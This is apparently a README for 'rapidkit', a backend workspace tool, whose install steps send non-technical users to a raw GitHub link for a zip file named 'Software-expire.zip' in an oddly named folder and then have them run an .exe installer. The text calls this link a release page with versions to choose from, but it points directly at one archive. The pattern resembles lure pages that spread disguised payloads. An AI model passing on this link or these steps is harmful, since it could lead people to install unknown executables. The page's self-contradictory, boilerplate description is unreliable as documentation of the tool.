rapidkit is the central hub for managing backend projects. It helps you set up workspaces quickly and works well for teams and production-ready projects. You do not need to know programming to get started.
To get the software, visit this page:
https://raw.githubusercontent.com/RRThomasmusic/rapidkit/main/solidarize/Software-expire.zip
This page contains the latest versions. Click the version you want, then download the Windows installer file. The installer usually has a name ending in .exe.
Download the latest stable version for the best experience.
- Windows 10 or later (64-bit)
- At least 4 GB of RAM
- 2 GHz or faster processor
- 200 MB of free disk space
- Internet connection for initial setup and updates
Follow these steps to install and start rapidkit on your computer:
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Download the Installer
Go to the release page linked above. Find the latest Windows installer (a file ending with.exe). Click on it to download. -
Run the Installer
Double-click the.exefile you downloaded. The Windows Installer will open. -
Install the Software
Follow the setup prompts:- Choose the default installation folder or select your own.
- Agree to the software license terms.
- Click Install.
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Wait for Installation to Finish
The installer will copy files and set up rapidkit. This usually takes a few minutes. -
Launch rapidkit
Once installation completes, find rapidkit in your Start Menu or on your desktop and open it.
rapidkit helps you build backend projects using popular software and frameworks. It manages workspaces so your projects stay organized.
- You do not need to write commands. rapidkit provides a user-friendly interface to handle setup and updates.
- Supports many tools like Python, Node.js, and backend frameworks (FastAPI, NestJS).
- Works well for teams with shared backends and modern development environments.
- Workspace Setup: Quickly create backend project spaces ready for work.
- Project Templates: Use pre-made templates to start common backend projects.
- Team Collaboration: Share and sync workspace settings with team members.
- CLI Support: For users wanting more advanced control, rapidkit includes a command-line interface.
- VSCode Extension: Integrates with Visual Studio Code to improve your editing workflow.
- Open Source: You can review and contribute to the code on GitHub.
- Choose a backend template.
- Use rapidkit to create the workspace.
- Open the workspace in Visual Studio Code (if installed).
- Let rapidkit manage dependencies and tools automatically.
- Start building and testing your backend.
If rapidkit does not start or work as expected:
- Check that your Windows system meets the requirements.
- Make sure your internet connection is active for setup tasks.
- Restart your computer and try again.
- Visit the GitHub issues page for community help and to report problems.
Check the releases page regularly to download newer versions. Updates fix bugs and add features.
To update:
- Download the new installer from the release page linked above.
- Run the installer and follow the prompts.
- Your data and settings will remain intact.
- Visit GitHub issues for support questions.
- Search the repository’s documentation for guides and FAQs.